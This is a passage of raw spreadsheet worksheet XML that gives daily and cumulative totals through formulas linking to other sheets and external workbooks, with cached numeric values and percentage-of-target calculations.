        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]30'!$Q$83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G75+'29'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'29'!K75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G76+'29'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'29'!K76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G77+'29'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'29'!K77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G78+'29'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'29'!K78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'[16]30'!$E$7</f>
        <v>546.68</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'29'!H79</f>
        <v>16177.78</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>163306.25</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]30'!$I$7</f>
        <v>573.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'29'!K79</f>
        <v>14826.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>156717.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]30'!$L$7</f>
        <v>6236.06</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>12.47212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'[16]30'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'29'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]30'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'29'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]30'!$Y$15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G81+'29'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'29'!K81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G82+'29'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'29'!K82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G83+'29'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'29'!K83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G84+'29'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'29'!K84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G85+'29'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'29'!K85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58"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E35" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="H51" sqref="H51"/>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s="172" customFormat="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s="172" customFormat="1" ht="14.25" customHeight="1" spans="1:26">
      <c r="A2" s="175" t="s">
        <v>207</v>
      </c>
      <c r="B2" s="176"/>
      <c r="C2" s="176"/>
      <c r="D2" s="176"/>
      <c r="E2" s="177" t="s">
        <v>208</v>
      </c>
      <c r="F2" s="178"/>
      <c r="G2" s="177"/>
      <c r="H2" s="177"/>
      <c r="I2" s="179">
        <f>31/31</f>
        <v>1</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46022</v>
      </c>
      <c r="O2" s="182"/>
      <c r="P2" s="182"/>
      <c r="Q2" s="183"/>
      <c r="R2" s="184"/>
      <c r="S2" s="184"/>
      <c r="T2" s="184"/>
      <c r="U2" s="184"/>
      <c r="V2" s="184"/>
      <c r="W2" s="173"/>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172" customFormat="1"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s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A5" s="191" t="s">
        <v>226</v>
      </c>
      <c r="B5" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C5" s="193"/>
      <c r="D5" s="193"/>
      <c r="E5" s="194">
        <f t="shared" ref="E5:G5" si="0">E21+E31+E41+E51+E61+E68+E79</f>
        <v>650000</v>
      </c>
      <c r="F5" s="194">
        <f t="shared" si="0"/>
        <v>262736.854</v>
      </c>
      <c r="G5" s="194">
        <f t="shared" si="0"/>
        <v>18503</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'30'!H5</f>
        <v>651662.78</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6806528.81</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>21812.513</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'30'!K5</f>
        <v>715921.065</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6865992.196</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>203209.539</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>54.3341013368983</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]31'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]31'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]31'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]31'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]31'!$U$101</f>
        <v>31.0439516129032</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]31'!$V$101</f>
        <v>61.8069178082192</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]31'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]31'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]31'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]31'!$D$23+'[11]31'!$D$17+'[12]31'!$D$17+'[13]31'!$D$25+'[14]31'!$D$8+'[14]31'!$D$15+'[15]31'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]31'!$E$23+'[11]31'!$E$17+'[12]31'!$E$17+'[13]31'!$E$25+'[14]31'!$E$8+'[14]31'!$E$15+'[15]31'!$E$7</f>
        <v>848</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'30'!H6</f>
        <v>11871</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>288220.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]31'!$I$23+'[11]31'!$I$17+'[12]31'!$I$17+'[13]31'!$I$25+'[14]31'!$E$23+'[14]31'!$E$30+'[15]31'!$H$7</f>
        <v>514.5</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'30'!K6</f>
        <v>23039.03</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>285236.73</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]31'!$L$23+'[11]31'!$L$17+'[12]31'!$L$17+'[13]31'!$L$25+'[14]31'!$H$23+'[14]31'!$H$30+'[15]31'!$K$7</f>
        <v>20944.81</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]31'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]31'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]31'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]31'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]31'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]31'!$V$102</f>
        <v>32.4794406392694</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]31'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]31'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]31'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]31'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]31'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'30'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]31'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'30'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]31'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]31'!$W$107</f>
        <v>119.648397104447</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]31'!$X$107</f>
        <v>125.600949313443</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]31'!$Y$107</f>
        <v>131.25975586071</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]31'!$T$107</f>
        <v>40.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]31'!$U$107</f>
        <v>39.6438172043011</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]31'!$V$107</f>
        <v>31.7394977168949</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]31'!$Q$107</f>
        <v>9.67</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]31'!$R$107</f>
        <v>294.95</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]31'!$S$107</f>
        <v>2780.38</v>
      </c>
    </row>
    <row r="8" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]31'!$D$27+'[11]31'!$D$18+'[13]31'!$D$26+'[14]31'!$D$10+'[14]31'!$D$17+'[15]31'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]31'!$E$27+'[11]31'!$E$18+'[13]31'!$E$26+'[14]31'!$E$10+'[14]31'!$E$17+'[15]31'!$E$9</f>
        <v>2999</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'30'!H8</f>
        <v>72204</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>597740.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]31'!$I$27+'[11]31'!$I$18+'[13]31'!$I$26+'[14]31'!$E$25+'[14]31'!$E$32+'[15]31'!$H$9</f>
        <v>2416.74</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'30'!K8</f>
        <v>79580.42</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>587325.13</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]31'!$L$27+'[11]31'!$L$18+'[13]31'!$L$26+'[14]31'!$H$25+'[14]31'!$H$32+'[15]31'!$K$9</f>
        <v>34503.48</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]31'!$W$108</f>
        <v>113.547052740434</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]31'!$X$108</f>
        <v>130.57091882248</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]31'!$Y$108</f>
        <v>127.842014882656</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]31'!$T$108</f>
        <v>40.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]31'!$U$108</f>
        <v>45.2016129032258</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]31'!$V$108</f>
        <v>28.9172374429223</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]31'!$Q$108</f>
        <v>9.67</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]31'!$R$108</f>
        <v>336.3</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]31'!$S$108</f>
        <v>2533.15</v>
      </c>
    </row>
    <row r="9" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]31'!$D$24+'[11]31'!$D$19+'[12]31'!$D$20+'[13]31'!$D$27+'[14]31'!$D$11+'[14]31'!$D$18+'[15]31'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]31'!$E$24+'[11]31'!$E$19+'[12]31'!$E$20+'[13]31'!$E$27+'[14]31'!$E$11+'[14]31'!$E$18+'[15]31'!$E$10</f>
        <v>12909</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'30'!H9</f>
        <v>462980.19</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4598369.07</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]31'!$I$24+'[11]31'!$I$19+'[12]31'!$I$20+'[13]31'!$I$27+'[14]31'!$E$26+'[14]31'!$E$33+'[15]31'!$H$10</f>
        <v>15960.083</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'30'!K9</f>
        <v>484759.365</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4582238.176</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]31'!$L$24+'[11]31'!$L$19+'[12]31'!$L$20+'[13]31'!$L$27+'[14]31'!$H$26+'[14]31'!$H$33+'[15]31'!$K$10</f>
        <v>89086.537</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]31'!$W$109</f>
        <v>234.625</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]31'!$X$109</f>
        <v>262.129479427813</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]31'!$Y$109</f>
        <v>270.500810282931</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]31'!$T$109</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]31'!$U$109</f>
        <v>36.4569892473118</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]31'!$V$109</f>
        <v>35.0094748858447</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]31'!$Q$109</f>
        <v>8</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]31'!$R$109</f>
        <v>271.24</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]31'!$S$109</f>
        <v>3066.82999999999</v>
      </c>
    </row>
    <row r="10" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]31'!$D$25+'[11]31'!$D$20+'[12]31'!$D$21+'[13]31'!$D$28+'[14]31'!$D$12+'[14]31'!$D$19+'[15]31'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]31'!$E$25+'[11]31'!$E$20+'[12]31'!$E$21+'[13]31'!$E$28+'[14]31'!$E$12+'[14]31'!$E$19+'[15]31'!$E$11</f>
        <v>1747</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'30'!H10</f>
        <v>66326</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>983853.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]31'!$I$25+'[11]31'!$I$20+'[12]31'!$I$21+'[13]31'!$I$28+'[14]31'!$E$27+'[14]31'!$E$34+'[15]31'!$H$11</f>
        <v>2314</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'30'!K10</f>
        <v>88041.12</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>985269.84</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]31'!$L$25+'[11]31'!$L$20+'[12]31'!$L$21+'[13]31'!$L$28+'[14]31'!$H$27+'[14]31'!$H$34+'[15]31'!$K$11</f>
        <v>39491.822</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]31'!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]31'!$X$110</f>
        <v>243.93649579189</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]31'!$Y$110</f>
        <v>266.698287202608</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]31'!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]31'!$U$110</f>
        <v>35.1344086021506</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]31'!$V$110</f>
        <v>34.5372146118721</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]31'!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]31'!$R$110</f>
        <v>261.4</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]31'!$S$110</f>
        <v>3025.46</v>
      </c>
    </row>
    <row r="11" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]31'!$D$26+'[11]31'!$D$21+'[12]31'!$D$19+'[13]31'!$D$29+'[14]31'!$D$13+'[14]31'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]31'!$E$26+'[11]31'!$E$21+'[12]31'!$E$19+'[13]31'!$E$29+'[14]31'!$E$13+'[14]31'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'30'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]31'!$I$26+'[11]31'!$I$21+'[12]31'!$I$19+'[13]31'!$I$29+'[14]31'!$E$28+'[14]31'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'30'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]31'!$L$26+'[11]31'!$L$21+'[12]31'!$L$19+'[13]31'!$L$29+'[14]31'!$H$28+'[14]31'!$H$35</f>
        <v>0</v>
      </c>
      <c r="N11" s="195"/>
      <c r="O11" s="199"/>
      <c r="P11" s="200"/>
      <c r="Q11" s="203" t="s">
        <v>298</v>
      </c>
      <c r="R11" s="204"/>
      <c r="S11" s="204"/>
      <c r="T11" s="204"/>
      <c r="U11" s="204"/>
      <c r="V11" s="204"/>
      <c r="W11" s="204"/>
      <c r="X11" s="204"/>
      <c r="Y11" s="204"/>
      <c r="Z11" s="204"/>
    </row>
    <row r="12" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A12" s="191"/>
      <c r="B12" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C12" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D12" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E12" s="194">
        <f t="shared" ref="E12:E15" si="1">E22+E32+E42+E52</f>
        <v>538000</v>
      </c>
      <c r="F12" s="194">
        <f>F22+F32+F42+F52+F62+F69</f>
        <v>374372.59500005</v>
      </c>
      <c r="G12" s="194">
        <f>G22+G32+G42+G52</f>
        <v>5548.73000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'30'!H12</f>
        <v>225474.170000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5167865.42</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>14121.62</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'30'!K12</f>
        <v>524793.728</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5553900.104</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>135024.337000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>30.7572521640207</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]31'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]31'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]31'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]31'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]31'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]31'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]31'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]31'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]31'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f t="shared" ref="E13:G13" si="2">E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f t="shared" si="2"/>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'30'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'30'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>24.7751077064313</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]31'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]31'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]31'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]31'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]31'!$U$68</f>
        <v>52.5497311827957</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]31'!$V$68</f>
        <v>69.9372146118722</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]31'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]31'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]31'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2747</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'30'!H14</f>
        <v>85559</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1050102.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>4412.85</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'30'!K14</f>
        <v>177263.228</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1970207.334</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>48773.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]31'!$W$71</f>
        <v>222.5</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]31'!$X$71</f>
        <v>222.260126709285</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]31'!$Y$71</f>
        <v>214.198871856523</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]31'!$T$71</f>
        <v>33.3333333333333</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]31'!$U$71</f>
        <v>46.885752688172</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]31'!$V$71</f>
        <v>49.9466894977169</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]31'!$Q$71</f>
        <v>8.00</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]31'!$R$71</f>
        <v>348.83</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]31'!$S$71</f>
        <v>4375.33</v>
      </c>
    </row>
    <row r="15" s="172" customFormat="1" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f t="shared" ref="F15:J15" si="3">F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'30'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f t="shared" si="3"/>
        <v>136.77</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'30'!K15</f>
        <v>9668.522</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>124425.022</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]31'!$W$72</f>
        <v>64.8888888888889</v>
      </c>
      <c r="S15" s="209">
